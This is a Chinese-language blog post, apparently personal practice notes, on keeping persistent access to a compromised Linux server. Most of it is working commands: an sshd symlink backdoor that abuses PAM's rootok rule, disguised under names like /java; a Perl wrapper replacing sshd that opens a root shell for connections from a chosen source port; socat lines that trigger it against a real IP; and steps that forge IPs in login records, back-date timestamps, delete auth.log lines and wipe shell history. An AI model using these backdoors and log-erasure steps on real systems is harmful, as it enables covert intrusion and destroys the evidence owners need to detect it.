<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>linux持续化实践 - Lee&#039;s Blog</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="Lee&#039;s Blog"><meta name="msapplication-TileImage" content="/img/雪人.svg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Lee&#039;s Blog"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="通过各种方式获得linux服务器的ssh连接之后 在我的想法里，下一步就是在服务器里留下后门，这样可以方便进行下一步的利用 所以我尝试实践一下linux持续化的知识以此巩固"><meta property="og:type" content="blog"><meta property="og:title" content="linux持续化实践"><meta property="og:url" content="https://lee0568.github.io/2025/01/10/linux%E6%8C%81%E7%BB%AD%E5%8C%96%E5%AE%9E%E8%B7%B5/"><meta property="og:site_name" content="Lee&#039;s Blog"><meta property="og:description" content="通过各种方式获得linux服务器的ssh连接之后 在我的想法里，下一步就是在服务器里留下后门，这样可以方便进行下一步的利用 所以我尝试实践一下linux持续化的知识以此巩固"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://lee0568.github.io/images/%E8%BD%AF%E8%BF%9E%E6%8E%A5%E6%B5%8B%E8%AF%95.jpg"><meta property="og:image" content="https://lee0568.github.io/%E8%BD%AF%E8%BF%9E%E6%8E%A5%E6%B5%8B%E8%AF%95.jpg"><meta property="og:image" content="https://lee0568.github.io/PAM.jpg"><meta property="og:image" content="https://lee0568.github.io/rootok%E7%AD%9B%E9%80%89.jpg"><meta property="og:image" content="https://lee0568.github.io/%E5%86%8D%E5%88%A9%E7%94%A8%E8%BD%AF%E8%BF%9E%E6%8E%A5.jpg"><meta property="og:image" content="https://lee0568.github.io/%E5%86%8D%E5%88%A9%E7%94%A8%E6%B5%8B%E8%AF%95.jpg"><meta property="og:image" content="https://lee0568.github.io/wtmp.jpg"><meta property="og:image" content="https://lee0568.github.io/vtmp%E4%BF%AE%E6%94%B9.jpg"><meta property="og:image" content="https://lee0568.github.io/btmp%E4%BF%AE%E6%94%B9.jpg"><meta property="og:image" content="https://lee0568.github.io/btmp.jpg"><meta property="og:image" content="https://lee0568.github.io/lastlog%E4%BF%AE%E6%94%B9.jpg"><meta property="article:published_time" content="2025-01-09T17:00:10.000Z"><meta property="article:modified_time" content="2025-01-31T19:42:15.179Z"><meta property="article:author" content="John Doe"><meta property="article:tag" content="渗透,你好"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://lee0568.github.io/images/%E8%BD%AF%E8%BF%9E%E6%8E%A5%E6%B5%8B%E8%AF%95.jpg"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://lee0568.github.io/2025/01/10/linux%E6%8C%81%E7%BB%AD%E5%8C%96%E5%AE%9E%E8%B7%B5/"},"headline":"linux持续化实践","image":["https://lee0568.github.io/images/%E8%BD%AF%E8%BF%9E%E6%8E%A5%E6%B5%8B%E8%AF%95.jpg","https://lee0568.github.io/%E8%BD%AF%E8%BF%9E%E6%8E%A5%E6%B5%8B%E8%AF%95.jpg","https://lee0568.github.io/PAM.jpg","https://lee0568.github.io/rootok%E7%AD%9B%E9%80%89.jpg","https://lee0568.github.io/%E5%86%8D%E5%88%A9%E7%94%A8%E8%BD%AF%E8%BF%9E%E6%8E%A5.jpg","https://lee0568.github.io/%E5%86%8D%E5%88%A9%E7%94%A8%E6%B5%8B%E8%AF%95.jpg","https://lee0568.github.io/wtmp.jpg","https://lee0568.github.io/vtmp%E4%BF%AE%E6%94%B9.jpg","https://lee0568.github.io/btmp%E4%BF%AE%E6%94%B9.jpg","https://lee0568.github.io/btmp.jpg","https://lee0568.github.io/lastlog%E4%BF%AE%E6%94%B9.jpg"],"datePublished":"2025-01-09T17:00:10.000Z","dateModified":"2025-01-31T19:42:15.179Z","author":{"@type":"Person","name":"John Doe"},"publisher":{"@type":"Organization","name":"Lee's Blog","logo":{"@type":"ImageObject","url":"https://lee0568.github.io/2025/01/10/linux%E6%8C%81%E7%BB%AD%E5%8C%96%E5%AE%9E%E8%B7%B5/text：ugly%20site"}},"description":"通过各种方式获得linux服务器的ssh连接之后 在我的想法里，下一步就是在服务器里留下后门，这样可以方便进行下一步的利用 所以我尝试实践一下linux持续化的知识以此巩固"}</script><link rel="canonical" href="https://lee0568.github.io/2025/01/10/linux%E6%8C%81%E7%BB%AD%E5%8C%96%E5%AE%9E%E8%B7%B5/"><link rel="icon" href="/img/%E9%9B%AA%E4%BA%BA.svg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link data-pjax rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@11.7.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link data-pjax rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head><body class="is-2-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/text%EF%BC%9Augly%20site" alt="Lee&#039;s Blog" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">主页</a><a class="navbar-item" href="/archives">更新链条</a><a class="navbar-item" href="/categories">合集</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/about">我</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2025-01-09T17:00:10.000Z" title="2025/1/10 01:00:10">2025-01-10</time>发表</span><span class="level-item"><time dateTime="2025-01-31T19:42:15.179Z" title="2025/2/1 03:42:15">2025-02-01</time>更新</span><span class="level-item">8 分钟读完 (大约1211个字)</span><span class="level-item" id="busuanzi_container_page_pv"><span id="busuanzi_value_page_pv">0</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile">linux持续化实践</h1><div class="content"><p>通过各种方式获得linux服务器的ssh连接之后</p>
<p>在我的想法里，下一步就是在服务器里留下后门，这样可以方便进行下一步的利用</p>
<p>所以我尝试实践一下linux持续化的知识以此巩固</p>
<span id="more"></span>

<p>我在一篇文章里看到，作者把linux的后门分成配置型、logger型和rookit型</p>
<p>配置型是指借助Linux系统本身的一些特性来完成后门布置功能。</p>
<h1 id="配置型-软连接"><a href="#配置型-软连接" class="headerlink" title="配置型 - 软连接"></a>配置型 - 软连接</h1><pre><code>ln -sf /usr/sbin/sshd /tmp/su /tmp/su -oPort=5555
</code></pre>
<p>d:\博客\source\images\软连接.jpg<br><img src="/images/%E8%BD%AF%E8%BF%9E%E6%8E%A5%E6%B5%8B%E8%AF%95.jpg" alt="alt text"><br><img src="/%E8%BD%AF%E8%BF%9E%E6%8E%A5%E6%B5%8B%E8%AF%95.jpg" alt="alt text"></p>
<p>这条命令的作用是创建一个从 &#x2F;tmp&#x2F;su 到 &#x2F;usr&#x2F;sbin&#x2F;sshd 的符号链接。这样，当你执行 &#x2F;tmp&#x2F;su 时，实际上是在执行 &#x2F;usr&#x2F;sbin&#x2F;sshd。然后通过这个符号链接启动一个 SSH 服务器，监听在 5555 端口上。</p>
<p>sshd是SSH (Secure Shell) 服务器的守护进程，用于处理 SSH 客户端的连接请求，并提供安全的远程登录和文件传输功能。它能成功连接的原因是sshd开启了PAM认证，且因为是通过su的链接执行sshd，所以调用了PAM认证中的su</p>
<p>为什么su可以随意登录，通过diff -B -b -i-r -t sshd su，比较两个文件</p>
<p>su的认证策略是rootok，也就是只要是root用户就可以无需密码登录，这种在实际场景下的作用是，root用户可以无需密码切换到其他用户，而其他用户需要输入目标用户的密码<br>auth       sufficient pam_rootok.so</p>
<p>sshd的认证则包含 &#x2F;etc&#x2F;pam.d&#x2F;common-auth 文件中的认证模块配置。这通常用于标准的 Unix 密码认证，确保用户输入正确的密码才能登录。<br>@include common-auth</p>
<p>pam.d文件夹里可不止su和sshd，那合理推测是不是只要配置中包含auth sufficient pam_rootok.so都可以这么利用</p>
<p><img src="/PAM.jpg" alt="alt text"></p>
<p>实时也确实如此，利用</p>
<p>find .&#x2F; |xargs grep “pam_rootok”</p>
<p>去筛选<br><img src="/rootok%E7%AD%9B%E9%80%89.jpg" alt="alt text"></p>
<p><img src="/%E5%86%8D%E5%88%A9%E7%94%A8%E8%BD%AF%E8%BF%9E%E6%8E%A5.jpg" alt="alt text"><br><img src="/%E5%86%8D%E5%88%A9%E7%94%A8%E6%B5%8B%E8%AF%95.jpg" alt="alt text"></p>
<p>软连接优点是非常方便，但是缺点是很容易被发现，重启会断开</p>
<p>通过查看可疑端口<br>netstat -antlp<br>查看可执行文件<br>ls -al &#x2F;tmp&#x2F;su<br>然后停止其进程，并删除这些文件</p>
<p>也可以禁止PAM认证<br>vim &#x2F;etc&#x2F;ssh&#x2F;sshd_config<br>UsePAM no<br>再重载程序<br>&#x2F;etc&#x2F;init.d&#x2F;sshd reload</p>
<p>因为通常会su来判断是否是软连接，所有有一种掩耳盗铃的方法</p>
<p>cp &#x2F;etc&#x2F;pam.d&#x2F;su &#x2F;etc&#x2F;pam.d&#x2F;java<br>#cp &#x2F;etc&#x2F;pam.d&#x2F;su postgres</p>
<p>ln -sf &#x2F;usr&#x2F;sbin&#x2F;sshd &#x2F;java;<br>#ln -sf &#x2F;usr&#x2F;sbin&#x2F;sshd &#x2F;postgres;</p>
<p>&#x2F;java -oPort&#x3D;5555<br>#&#x2F;postgres -oPort&#x3D;5555</p>
<p>优点:</p>
<p>隐蔽性较强，无需要编译，使用于大部分环境中<br>在无连接后门的情况下，管理员是看不到端口和进程的，last也查不到登陆<br>缺点:</p>
<p>需要重启sshd进程</p>
<h1 id="cd-usr-sbin"><a href="#cd-usr-sbin" class="headerlink" title="cd &#x2F;usr&#x2F;sbin&#x2F;"></a>cd &#x2F;usr&#x2F;sbin&#x2F;</h1><h1 id="mv-sshd-bin"><a href="#mv-sshd-bin" class="headerlink" title="mv sshd ..&#x2F;bin"></a>mv sshd ..&#x2F;bin</h1><h1 id="vim-sshd"><a href="#vim-sshd" class="headerlink" title="vim sshd"></a>vim sshd</h1><p>#!&#x2F;usr&#x2F;bin&#x2F;perl<br>exec”&#x2F;bin&#x2F;sh”if(getpeername(STDIN)&#x3D;~&#x2F;^..LF&#x2F;);<br>exec{“&#x2F;usr&#x2F;bin&#x2F;sshd”}”&#x2F;usr&#x2F;sbin&#x2F;sshd”,@ARGV;</p>
<p>cd &#x2F;usr&#x2F;sbin&#x2F;<br>mv sshd ..&#x2F;bin&#x2F;    #对sshd程序做备份<br>echo ‘#!&#x2F;usr&#x2F;bin&#x2F;perl’ &gt;sshd<br>echo ‘exec “&#x2F;bin&#x2F;sh” if(getpeername(STDIN) &#x3D;~ &#x2F;^..4A&#x2F;);’ &gt;&gt;sshd<br>echo ‘exec{“&#x2F;usr&#x2F;bin&#x2F;sshd”} “&#x2F;usr&#x2F;sbin&#x2F;sshd”,@ARGV,’ &gt;&gt;sshd<br>chmod u+x sshd<br>&#x2F;etc&#x2F;init.d&#x2F;ssh restart</p>
<p>socat STDIO TCP4:62.216.92.105:22,sourceport&#x3D;19526<br>socat STDIO TCP4:62.216.92.105:35241,sourceport&#x3D;13377</p>
<p>&#x2F;var&#x2F;log&#x2F;btmp：记录SSH登录错误尝试。 相关命令：lastb<br>&#x2F;var&#x2F;log&#x2F;wtmp：记录当前和历史登录系统的用户信息。相关命令：last<br>&#x2F;var&#x2F;run&#x2F;utmp：当前正在登录系统的用户信息。 相关命令：w<br>&#x2F;var&#x2F;log&#x2F;lastlog：记录用户上次登录信息。<br>&#x2F;var&#x2F;log&#x2F;auth.log：认证相关的日志 [Debian]<br>&#x2F;var&#x2F;log&#x2F;secure：认证相关的日志 [Centos]</p>
<p>wtmp的修改</p>
<p><img src="/wtmp.jpg" alt="alt text"></p>
<p>utmpdump &#x2F;var&#x2F;log&#x2F;wtmp |sed “s&#x2F;192.168.179.1&#x2F;114.114.114.114&#x2F;g” |utmpdump -r &gt;&#x2F;tmp&#x2F;wtmp &amp;&amp; mv &#x2F;tmp&#x2F;wtmp &#x2F;var&#x2F;log&#x2F;wtmp</p>
<p><img src="/vtmp%E4%BF%AE%E6%94%B9.jpg" alt="alt text"></p>
<p>记得要记一下之前的时间戳，改完wtmp，也要改时间戳<br>stat &#x2F;var&#x2F;log&#x2F;wtmp</p>
<p>touch -a -d “2021-1-1 12:13:14” &#x2F;var&#x2F;log&#x2F;wtmp</p>
<p>btmp修改<br>utmpdump &#x2F;var&#x2F;log&#x2F;btmp |sed “s&#x2F;192.168.179.1&#x2F;8.8.8.8&#x2F;g” |utmpdump -r &gt;&#x2F;tmp&#x2F;btmp &amp;&amp; mv &#x2F;tmp&#x2F;btmp &#x2F;var&#x2F;log&#x2F;btmp</p>
<p><img src="/btmp%E4%BF%AE%E6%94%B9.jpg" alt="alt text"><br><img src="/btmp.jpg" alt="alt text"></p>
<p>sed -i ‘s&#x2F;192.168.179.1&#x2F;8.8.8.8&#x2F;g’ &#x2F;var&#x2F;log&#x2F;lastlog<br><img src="/lastlog%E4%BF%AE%E6%94%B9.jpg" alt="alt text"></p>
<p>#成功记录<br>cat auth.log |grep ‘Accepted’<br>cat secure   | grep ‘Accepted’<br>#失败记录<br>cat auth.log | grep ‘Failed’<br>cat secure   | grep ‘Failed’</p>
<p>#替换IP<br>sed -i ‘s&#x2F;8.8.8.8&#x2F;123.123.123.123&#x2F;g’ &#x2F;var&#x2F;log&#x2F;auth.log #Debian<br>sed -i ‘s&#x2F;8.8.8.8&#x2F;123.123.123.123&#x2F;g’ &#x2F;var&#x2F;log&#x2F;secure #Centos</p>
<p>#删除相关时间<br>sed -i ‘&#x2F;Dec 27 <em>:</em>:*&#x2F;d’ auth.log #Dec 27的记录都将被删除。</p>
<p>sed -i ‘150,$d’ ~&#x2F;.bash_history</p>
<p>history -cw</p>
<p><a target="_blank" rel="noopener" href="https://blackwolfsec.cc/2017/03/24/Linux_ssh_backdoor/">https://blackwolfsec.cc/2017/03/24/Linux_ssh_backdoor/</a><br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/sevck/p/6495884.html">https://www.cnblogs.com/sevck/p/6495884.html</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_72543266/article/details/142287236">https://blog.csdn.net/weixin_72543266/article/details/142287236</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44155363/article/details/106760315">https://blog.csdn.net/weixin_44155363/article/details/106760315</a><br><a target="_blank" rel="noopener" href="https://atsud0.me/2022/01/Linux%E7%97%95%E8%BF%B9%E6%B8%85%E9%99%A4%E7%AC%94%E8%AE%B0/">https://atsud0.me/2022/01/Linux%E7%97%95%E8%BF%B9%E6%B8%85%E9%99%A4%E7%AC%94%E8%AE%B0/</a></p>
</div><div class="article-licensing box"><div class="licensing-title"><p>linux持续化实践</p><p><a href="https://lee0568.github.io/2025/01/10/linux持续化实践/">https://lee0568.github.io/2025/01/10/linux持续化实践/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>John Doe</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2025-01-10</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2025-02-01</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="article-tags is-size-7 mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/%E6%B8%97%E9%80%8F-%E4%BD%A0%E5%A5%BD/">渗透,你好</a></div><div class="notification is-danger">You need to set <code>install_url</code> to use ShareThis. Please set it in <code>_config.yml</code>.</div></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">喜欢这篇文章？打赏一下作者吧</h3><div class="buttons is-centered"><a class="button donate" href="/" target="_blank" rel="noopener" data-type="afdian"><span class="icon is-small"><i class="fas fa-charging-station"></i></span><span>爱发电</span></a><a class="button donate" data-type="alipay"><span class="icon is-small"><i class="fab fa-alipay"></i></span><span>支付宝</span><span class="qrcode"><img src="/" alt="支付宝"></span></a><a class="button donate" href="/" target="_blank" rel="noopener" data-type="buymeacoffee"><span class="icon is-small"><i class="fas fa-coffee"></i></span><span>送我杯咖啡</span></a><a class="button donate" href="/" target="_blank" rel="noopener" data-type="patreon"><span class="icon is-small"><i class="fab fa-patreon"></i></span><span>Patreon</span></a><div class="notification is-danger">You forgot to set the <code>business</code> or <code>currency_code</code> for Paypal. Please set it in <code>_config.yml</code>.</div><a class="button donate" data-type="wechat"><span class="icon is-small"><i class="fab fa-weixin"></i></span><span>微信</span><span class="qrcode"><img src="/" alt="微信"></span></a></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2025/01/24/%E6%84%8F%E8%AF%86%E5%BD%A2%E6%80%81%E7%9A%84%E5%B4%87%E9%AB%98%E5%AE%A2%E4%BD%93%E7%9A%84%E7%AC%94%E8%AE%B0/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">意识形态的崇高客体的笔记</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2024/12/24/kimi%E8%B0%83%E6%95%99%E4%B8%BA%E5%93%B2%E5%AD%A6%E6%9C%BA%E5%99%A8%E4%BA%BA/"><span class="level-item">kimi调教为哲学机器人</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card" id="comments"><div class="card-content"><h3 class="title is-5">评论</h3><div class="notification is-danger">You forgot to set the <code>shortname</code> for Disqus. Please set it in <code>_config.yml</code>.</div></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-4-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar is-rounded" src="/%5Cimg%5Clog.jpg" alt="lee"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">lee</p><p class="is-size-6 is-block">Lee&#039;s Blog</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>河流 右岸</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives/"><p class="title">3</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories/"><p class="title">0</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags/"><p class="title">3</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/Lee0568" target="_blank" rel="me noopener">关注我</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Github" href="https://github.com/ppoffice"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Facebook" href="https://facebook.com"><i class="fab fa-facebook"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Twitter" href="https://twitter.com"><i class="fab fa-twitter"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Dribbble" href="https://dribbble.com"><i class="fab fa-dribbble"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="RSS" href="/"><i class="fas fa-rss"></i></a></div></div></div><!--!--><div class="card widget" data-type="links"><div class="card-content"><div class="menu"><h3 class="menu-label">链接</h3><ul class="menu-list"><li><a class="level is-mobile" href="https://hexo.io" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">Hexo</span></span><span class="level-right"><span class="level-item tag">hexo.io</span></span></a></li><li><a class="level is-mobile" href="https://bulma.io" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">Bulma</span></span><span class="level-right"><span class="level-item tag">bulma.io</span></span></a></li></ul></div></div></div><!--!--><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">最新文章</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2025-01-24T10:13:42.000Z">2025-01-24</time></p><p class="title"><a href="/2025/01/24/%E6%84%8F%E8%AF%86%E5%BD%A2%E6%80%81%E7%9A%84%E5%B4%87%E9%AB%98%E5%AE%A2%E4%BD%93%E7%9A%84%E7%AC%94%E8%AE%B0/">意识形态的崇高客体的笔记</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2025-01-09T17:00:10.000Z">2025-01-10</time></p><p class="title"><a href="/2025/01/10/linux%E6%8C%81%E7%BB%AD%E5%8C%96%E5%AE%9E%E8%B7%B5/">linux持续化实践</a></p></div></article><article class="media"><figure class="media-left"><a class="image" href="/2024/12/24/kimi%E8%B0%83%E6%95%99%E4%B8%BA%E5%93%B2%E5%AD%A6%E6%9C%BA%E5%99%A8%E4%BA%BA/"><img src="/images/baiden.png" alt="kimi调教为哲学机器人"></a></figure><div class="media-content"><p class="date"><time dateTime="2024-12-23T17:10:25.000Z">2024-12-24</time></p><p class="title"><a href="/2024/12/24/kimi%E8%B0%83%E6%95%99%E4%B8%BA%E5%93%B2%E5%AD%A6%E6%9C%BA%E5%99%A8%E4%BA%BA/">kimi调教为哲学机器人</a></p></div></article></div></div><div class="card widget" data-type="archives"><div class="card-content"><div class="menu"><h3 class="menu-label">归档</h3><ul class="menu-list"><li><a class="level is-mobile" href="/archives/2025/01/"><span class="level-start"><span class="level-item">一月 2025</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li><li><a class="level is-mobile" href="/archives/2024/12/"><span class="level-start"><span class="level-item">十二月 2024</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li></ul></div></div></div><div class="card widget" data-type="tags"><div class="card-content"><div class="menu"><h3 class="menu-label">标签</h3><div class="field is-grouped is-grouped-multiline"><div class="control"><a class="tags has-addons" href="/tags/AI/"><span class="tag">AI</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%93%B2%E5%AD%A6/"><span class="tag">哲学</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E6%B8%97%E9%80%8F-%E4%BD%A0%E5%A5%BD/"><span class="tag">渗透,你好</span><span class="tag">1</span></a></div></div></div></div></div><div class="card widget" data-type="subscribe-email"><div class="card-content"><div class="menu"><h3 class="menu-label">订阅更新</h3><form action="https://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open(&#039;https://feedburner.google.com/fb/a/mailverify?uri=&#039;,&#039;popupwindow&#039;,&#039;scrollbars=yes,width=550,height=520&#039;);return true"><input type="hidden" value="" name="uri"><input type="hidden" name="loc" value="en_US"><div class="field has-addons"><div class="control has-icons-left is-expanded"><input class="input" name="email" type="email" placeholder="Email"><span class="icon is-small is-left"><i class="fas fa-envelope"></i></span></div><div class="control"><input class="button" type="submit" value="订阅"></div></div></form></div></div></div><div class="card widget"><div class="card-content"><div class="notification is-danger">You need to set <code>client_id</code> and <code>slot_id</code> to show this AD unit. Please set it in <code>_config.yml</code>.</div></div></div><div class="card widget" data-type="subscribe-email"><div class="card-content"><div class="menu"><h3 class="menu-label">follow.it</h3><form action="" method="post" target="_blank"><div class="field has-addons"><div class="control has-icons-left is-expanded"><input class="input" name="email" type="email" placeholder="Email"><span class="icon is-small is-left"><i class="fas fa-envelope"></i></span></div><div class="control"><input class="button" type="submit" value="订阅"></div></div></form></div></div></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/text%EF%BC%9Augly%20site" alt="Lee&#039;s Blog" height="28"></a><p class="is-size-7"><span>&copy; 2025 John Doe</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a><br><span id="busuanzi_container_site_uv">共<span id="busuanzi_value_site_uv">0</span>个访客</span></p><p class="is-size-7">© 2019</p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-cn");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script data-pjax src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script data-pjax src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "此网站使用Cookie来改善您的体验。",
          dismiss: "知道了！",
          allow: "允许使用Cookie",
          deny: "拒绝",
          link: "了解更多",
          policy: "Cookie政策",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.min.js"></script><script src="/js/pjax.js"></script><!--!--><!--!--><!--!--><script data-pjax src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script data-pjax src="/js/insight.js" defer></script><script data-pjax>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>